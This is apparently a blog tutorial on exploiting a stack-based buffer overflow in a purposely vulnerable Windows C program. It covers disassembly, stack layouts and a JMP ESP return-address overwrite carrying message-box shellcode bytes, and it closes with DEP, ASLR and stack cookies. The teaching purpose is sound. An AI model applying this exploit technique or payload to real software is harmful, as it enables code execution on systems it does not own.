Stack Based Buffer Overflows on x86 (Windows) – Part II

In the first part of this article, we discussed about the basics that we need to have in order to properly understand this type of vulnerability. As we went through how the compiling process works, how assembly looks like and how the stack works, we can go further and explore how a Stack Based Buffer Overflow vulnerability can be exploited.

Introduction

We previously discussed that the stack (during a function call) contains the following (in the below order, where the “local variables” are stored at the “smallest address” and “function parameters” are stored at the highest address):

  • Local variables of the function (for example 20 bytes)
  • Previous EBP value (to create the stack frame, saved with PUSH EBP)
  • Return address (placed on the stack by the CALL instruction)
  • Parameters of the function (placed on the stack using PUSH instructions)

If you can understand those things, it is easy to understand the Stack Based Buffer Overflow vulnerability. Let’s take the following example. We have the following function, called from “main” function:

#define _CRT_SECURE_NO_WARNINGS

#include "stdafx.h"
#include <stdio.h> 
#include <string.h>

// Function that displays the name 
void Display(char *p_pcName) 
{ 
    // Buffer (local variable) that will store the name 
    char buffer[20]; 
 
    // We copy the name in buffer 
    strcpy(buffer, p_pcName); 
 
    // Display the name 
    printf("Hello: %s", buffer); 
}

// Main function
int main() 
{ 
    Display("111122223333");
}

The program is very simple: it calls the “Display” function with the specified parameter.

We can see the problem here:

char buffer[20];
strcpy(buffer, p_pcName);

We have a local variable, buffer, which can store up to 20 bytes.

It is important to note that “char buffer[20]” is different from “char *buffer=(char*)malloc(20)” or “char *buffer=new char[20]“. Our version specifies that the buffer has 20 bytes which can be direclty allocated on the stack, it is a local variable that can store 20 bytes. The other two versions will dynamically allocate the space for the buffer, but the data will be stored on other memory region called “HEAP“, not on the stack. By the way, there are also “Heap Based Buffer Overflows“, but they are more complicated.

Having a local variable that can store 20 bytes on the stack, we will copy the string specified from the command line in that memory location. What happens if the length of the string received from command line is more that 20? We have a “buffer overflow”. The name of “Stack Based Buffer Overflow” comes from the fact that the buffer is stored on the stack.

Let’s see how the code is compiled. Please note that if you use a modern version of Visual Studio, you might get a totally different result. In order to keep everything simple, we should remove from project settings all optimizations, security features and functionalities that we don’t need.

Below is the compiled code of the main function:

000E1030 | 55             | push ebp            | Save previous EBP
000E1031 | 8B EC          | mov ebp,esp         | Create stack frame 
000E1033 | 68 0C 30 0E 00 | push sbof.E300C     | "111122223333"
000E1038 | E8 C3 FF FF FF | call <sbof.Display> | Call the function
000E103D | 83 C4 04       | add esp,4           | Clean the stack
000E1040 | 33 C0          | xor eax,eax         | eax = 0
000E1042 | 5D             | pop ebp             | Remove stack frame
000E1043 | C3             | ret                 | Return

As you can see, everything is as expected: there is only a PUSH for the “111122223333” string parameter, a function call and the stack is cleaned.

000E1000 | 55             | push ebp                      | 
000E1001 | 8B EC          | mov ebp,esp                   |

000E1003 | 83 EC 14       | sub esp,14                    | Allocate space on the stack for the buffer

000E1006 | 8B 45 08       | mov eax,dword ptr ss:[ebp+8]  | Get in EAX the string parameter address
000E1009 | 50             | push eax                      | Place it on the stack (second parameter)
000E100A | 8D 4D EC       | lea ecx,dword ptr ss:[ebp-14] | Get in EAX the address of the "buffer"
000E100D | 51             | push ecx                      | Place it on the stack (first parameter)
000E100E | E8 06 0C 00 00 | call <sbof.strcpy>            | Call strcpy(buffer, p_pcName); 
000E1013 | 83 C4 08       | add esp,8                     | Clean the stack

000E1016 | 8D 55 EC       | lea edx,dword ptr ss:[ebp-14] | Get in EAX the address of the "buffer"
000E1019 | 52             | push edx                      | Place it on the stack (second parameter)
000E101A | 68 00 30 0E 00 | push sbof.E3000               | "Hello: %s" string
000E101F | E8 6C 00 00 00 | call <sbof.printf>            | Call printf("Hello: %s", buffer);
000E1024 | 83 C4 08       | add esp,8                     | Clean the stack

000E1027 | 8B E5          | mov esp,ebp                   |
000E1029 | 5D             | pop ebp                       |
000E102A | C3             | ret                           |

The function allocates space for 20 bytes (0x14 in hexadecimal) and calls two functions:

  1. strcpy – with two parameters: the buffer and our string (111122223333)
  2. printf – with two parameters: “Hello, %s” string and  our string (111122223333)

Let’s see how the stack will look AFTER the strcpy function call, so after “add esp, 8” instruction:

00B9FED0 | 31313131 | "1111"
00B9FED4 | 32323232 | "2222"
00B9FED8 | 33333333 | "3333"
00B9FEDC | 770F8600 | The buffer has 20 bytes allocated, but there can be any data
00B9FEE0 | 000E12F7 | And those 8 bytes have junk data, as "111122223333" has 12 bytes and we allocated 20

00B9FEE4 | 00B9FEF0 | EBP saved on Display function first instruction
00B9FEE8 | 000E103D | Return address, the instruction after "call Display"
00B9FEEC | 000E300C | "111122223333" parameter for Display function
00B9FEF0 | 00B9FF38 | Previous EBP, from main function

As you can see, first 20 bytes (first 5 lines) represent the content of the “buffer”. We specified a string of 12 bytes (“111122223333”) and the rest of the string has junk data (it is not initialized with NULLs). However, please note that after “3333”, we have the following data: 770F8600. Last byte is a NULL byte and it was added by the “strcpy” function.

Now we can ask the question: “What will happen if the string parameter is longer than 20 bytes”? As you can probably guess, the answer is “We get a stack based buffer overflow”.

Exploitation

Let’s get back to the stack and see what we have there:

  1. The “buffer” (20 bytes)
  2. The Display function’s EBP
  3. The Return Address
  4. The parameter (the string)

What can go wrong? Let’s remember what will happen when a fuction returns (on RETN instruction): the execution continues from the “Return Address”. So, if we overflow the stack and overwrite the “Return Address” with someting else… we can control the execution of the program!

This is what will happen if we will use a string parameter of 28 bytes, instead of the maximum number of 20.

We will modify the call “Display(“111122223333”);” to “Display(“1111222233334444555566667777”);“. The stack will look like this:

00B9FED0 | 31313131 | "1111"
00B9FED4 | 32323232 | "2222"
00B9FED8 | 33333333 | "3333"
00B9FEDC | 34343434 | "4444"
00B9FEE0 | 35353535 | "5555"

00B9FEE4 | 36363636 | "6666" - EBP saved on Display function first instruction
00B9FEE8 | 37373737 | "7777" - Return address, the instruction after "call Display"
00B9FEEC | 000E300C | "111122223333" parameter for Display function
00B9FEF0 | 00B9FF38 | Previous EBP, from main function

This means, that when the execution of the “Display” function will be finished (at the RETN instruction), de execution will jump to the address “0x37373737”. So, in conclusion, the EIP value will be 0x37373737, a value that we control.

After the RETN instruction, the return address will be removed from the stack. This means that the top of the stack, the ESP register, will point to the address: 0x00B9FEEC. We can see that if we use a string larger than 28 bytes (20 bytes buffer + 4 bytes saved EBP + 4 bytes return address) we will overwrite data on stack. Since the ESP value will point to something that we control, how can we easily execute arbitrary code?

There are two things we control:

  1. The return address (EIP)
  2. The data at the top of the stack (ESP)

The easiest solution will be to find a “JMP ESP” instruction. For example, let’s assume that the code of our program, or one of the DLLs, have a JMP ESP instruction at address 0x12345678. What we will do, will be to replace the return address with the address of this instruction (0x012345678) instead of “0x37373737” and we can redirect the execution of the program to the top of the stack, where we can place any code and do whatever we want with the program!

Let’s open the program in x64dbg, an open-source debugger. A debugger is a program that allows you to open a program and step through instructions, allowing you to see at runtime the contents of the memory or the registers values. It is a powerful tool with mutiple features. Looking at the top of SBOF.exe program, we can see our two functions. Below is a screenshot.

x64 example

Click each “PUSH EBP” instructions at the beginning of the functions and press F2. This will place a breakpoint, so when you will run the program in the debugger, it will stop at those instructions. You can also use F7 to stept each instruction or F8 to step each instruction, but on CALL instructions, jump over the function call, do not dig into that one. Pressing F9 will run the program, and the debugger will stop at the selected breakpoints, or if some error will happen. It would be very useful to play around with the debugger to see how powerful are its features.

Now, in order to keep the things simple, we will modify the code to contain the “JMP ESP” instruction. We will add the following function:

// Function that does nothing, just contain jmo
void Nothing()
{
    __asm
    {
        jmp esp;
    }
}

As you can see in the debugger, the program contains also some other instructions and it uses DLLs (such as kernel32.dll, ntdll.dll) which also contain a lot of code. We can use all this code to search for a JMP ESP instruction inside it. Right click, go to “Search for” > “All Modules” > “Command”, type “jmp esp” and press OK.

x64 search jmp

In our case, with the new function that contains the “JMP ESP” instruction, we can find it at the following address:

01371033 | FF E4 | jmp esp |

x64 jmp esp

Please note that you might have totally different addresses since modern operating systems, for security reasons, randomize the memory addresses, you will find more details later, in this article.

So, in order to create a working proof of concept, we will have to do the following, to create the following string:

  1. First 20 bytes will be the buffer
  2. Second 4 bytes will overwrite the saved EBP
  3. Following 4 bytes will be 0x01371033 – the address of the JMP ESP instuction
  4. The next bytes will represent the code we want to execute

So, let’s change the main function to the following:

int main() 
{ 
    Display("111122223333444455556666\x33\x10\x37\x01\xcc\xcc\xcc\xcc");
}

As you can see, we have in our string, the 0x01371033 address, but it is in reverse order! This is because the data is stored as “little endian” in memory, as we discussed in the first part of the article. The following “cc”s, represent the “INT 3” instruction, an instruction that will pause the debugger like we set a breakpoint.

We can replace this with a shellcode. A shellcode is a special code, most of the time written in Assembly, that compiled, it works directly. Normal machine code will not work, because the strings for example are placed in different memory regions and the code knows the addresses of the functions, for a shellcode, the strings will be placed in the same place as the code and the shellcode will find itself the addresses of the functions. If you want to know in detail how a shellcode works on Windows and how you can manually write one, I recommend you the following articles:

  1. Introduction to Windows shellcode development – Part 1
  2. Introduction to Windows shellcode development – Part 2
  3. Introduction to Windows shellcode development – Part 3

In order to keep things simple, we will use an existing shellcode. We can use this one: User32-free Messagebox Shellcode for any Windows version.

We will modify the main function to include this code. It will look like this:

int main() 
{ 
    Display(
        "111122223333444455556666\x33\x10\x37\x01"
        "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
        "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
        "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
        "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
        "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
        "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
        "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
        "\x49\x0b\x31\xc0\x51\x50\xff\xd7"
    );
}

As you can see, we have:

  1. Some random data
  2. Followed by the “JMP ESP” address
  3. The shellcode we copied form the above link

Please note that all this data must not contain a NULL byte. As the vulnerable call is a call to “strcpy” function, the “strcpy” function will stop execution when it will encounter the first NULL byte and we will not have all the data copied.

Now, when we will execute this program, this will happen:

x64 shellcode ok

We exploited it! This is the result of the copied shellcode. We managed to execute arbitrary code, code that we supplied and got full access to the execution of the program.

Now, you might think this is not a useful example. Of course it is not, it is for educational purposes. A program might get the string from the command line, or from the network, and the same thing might happen. Here are some common cases where this vulnerability might be present:

  • Getting data from the command line
  • Parsing a document (such as XML, HTML, PDF)
  • Reading data from the network (such as a FTP server, HTTP server)

Protection mechanisms

There are a few protections build to pretect against this type of attacks. All modern compilers and operating systems should have them.

DEP – Data Execution Prevention – Is a protection mechanism that works at both hardware level (NX bit – “No eXecute”) and software level and it does not allow the execution of code from the memory regions that do not the have the “execute” permissions. A memory page can have “read”, “write” and/or “execute” permissions. For example, e memory region containing data, such as strings can have “read” or “read-write” permissions, and a memory region containing code will have “read-execute” permissions. The stack, read-write permissions, is a memory region where it shuld not exist the possibility to execute code from. However, without DEP protection, this is possible, and DEP will protect against execution of code from the stack. As you can probably understand, our shellcode was executed from the stack and this protection will block our attack. It can be enabled in the compiler from “Configuration Properties” > “Linker” > “Advaned” > “Data Execution Prevention (DEP)”.

ALSR – Address Space Layour Randomization, which was introduced in Windows Vista and it is the reason why it is easier to understand this vulnerability on Windows XP, is another protection mechanism that can protect against this type of attacks. As we discussed, the DLL’s and the executable can contain different instructions, such as “JMP ESP” that attackers can use. Before ASLR, the executable and the DLLs where always loaded in memory at the same address. For example, the SBOF.exe code would always start at 0x10002000 and kernel32.dll might be loaded always at some address. This means that attackers can use the instructions from those binaries. But with ASLR, all modules, and also the stack and the heap memory, will be loaded at random addresses. This way, we can find the address of a JMP ESP instruction, but it will not work on other machine as the address will be different (randomly generated), since the module containing the instruction was loaded at a different memory address. It is possible to activate this feature from “Configuration Properties” > “Linker” > “Advaned” > “Randomized Base Address”.

Stack Cookies – This is another protection mechanism, specially build against this type of attacks, and it is offered by the compiler. This works by placing at the beginning of a function a random value called “stack cookie”, before the local variables of the function (such as our buffer). What will happen in a stack based buffer oveflow, will be to overwrite the data following the buffer, and this will also overwrite this random variable. This protection, before the “RETN” instructions, will check the value of the randomly generated stack cookie. If a stack based buffer overflow will occur, the value will be changed and this verification will fail, so the program will forcely stop execution and the shellcode will not be executed. This protection can be configured from  “Configuration Properties” > “C/C++” > “Code Generation” > “Security Check”.

Conclusion

Even if it is not difficult to understand this type of vulnerability, the main difficulty is to learn a few concepts such as Assembly language and how programs work under the hood. Due to existing protection mechanisms, a real-life exploitation of this type of attack is way more difficult. However, there are a few tricks that can be used in certain situations to bypass some of protections (if other are not present) but this is not the purpose of this article.

My suggestion, in order to properly understand this vulnerability, would be to compile a program like this, disable all protections and see what happens. You can modify the size of the buffer but the most important is to go instruction with instruction and understand everything with all the details. You can download the source code from the above example from here.

If you have any questions, please leave a comment here and use the contact email.

2 thoughts on “Stack Based Buffer Overflows on x86 (Windows) – Part II

  1. Pingback: Stack Based Buffer Overflows on x86 (Windows) – Part I | Nytro Security

  2. Pingback: Stack Based Buffer Overflows on x64 (Windows) – Nytro Security

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s